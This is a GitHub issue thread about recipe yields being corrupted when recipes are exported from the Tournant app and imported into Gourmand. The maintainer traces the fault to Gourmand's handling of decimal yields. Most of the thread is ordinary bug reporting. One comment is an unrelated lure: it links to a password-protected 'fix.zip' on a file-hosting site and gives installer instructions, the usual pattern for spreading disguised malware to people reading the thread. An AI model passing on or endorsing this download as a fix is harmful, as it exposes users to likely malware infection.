### ISSUE TITLE
Export from Tournant to Gourmand seems to mess up the yield

### ISSUE THREAD

**Issue by serpico** [Zimbelstern/Tournant#23]
The problem might be on Gourmand's side but in case anyone else encounter it, it's the first time I notice it and I regularly play with the "yield adjuster" both on Tournant and Gourmand.

All .xml or .grmt files renamed to .txt to allow import on github

I exported `Gateau de semoule 2024 cuisson vapeur.xml` from Tournant using the XML Gourmand option original yields was 5,0 once imported to Gourmand it became 1,0 ( a quick edit and save of the yield value in Gourmand using the Edit description button solved it ) - Yields in Gourmand GUI became Multiply by ( see screenshots )

Export from Tournant and then import to Gourmand `Riz au lait normand.xml` : from yield of 4,75 on Tournant I got a yield of 75,00 in Gourmand

I tried exporting from Gourmand to Tournant `[2024] Chili Con Carne 150% ( tomates éco+ ).grmt`  original yield was 15,0 still 15,0 after import in Tournant but when reexported `test[2024] Chili Con Carne 150% ( tomates éco+ ).xml` to Gourmand it became 1,0 - also Multiply by appeared again.

Gourmand version 1.0.0 Ubuntu 22.04.4 LTS

Tournant 2.8.0 from F-Droid

Asus Z010D

Android 6.0.1

[Gateau de semoule 2024 cuisson vapeur.txt](https://github.com/user-attachments/files/16795079/Gateau.de.semoule.2024.cuisson.vapeur.txt)
[Riz au lait normand.txt](https://github.com/user-attachments/files/16795081/Riz.au.lait.normand.txt)
[[2024] Chili Con Carne 150% ( tomates éco+ ).txt](https://github.com/user-attachments/files/16795084/2024.Chili.Con.Carne.150.tomates.eco%2B.txt)
[test[2024] Chili Con Carne 150% ( tomates éco+ ).txt](https://github.com/user-attachments/files/16795086/test.2024.Chili.Con.Carne.150.tomates.eco%2B.txt)

![Screenshot Gateau de semoule - multiply by](https://github.com/user-attachments/assets/4d4c9008-f49e-413a-9fcd-fc1e55aa1cfd)
![Screenshot Riz au lait](https://github.com/user-attachments/assets/36bfbdb8-0e9b-45ea-a33e-24263ffc3e1e)

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zimbelstern** [comment]
This is a bug of Gourmand which apparently can not read its own exported files when the yield contains decimal fractions.
Proof: Create a test recipe with a yield of 4,75 in Gourmand. Export the recipe. Import the same file directly in Gourmand. The yield will read 75.

Tournant could omit the decimal representation for whole numbers. But apart from that I'm afraid there is nothing I can do.

**Comment by serpico** [comment]
Thanks a lot for your feedback, I'll open an issue there linking to this one in case the development is resumed in the future
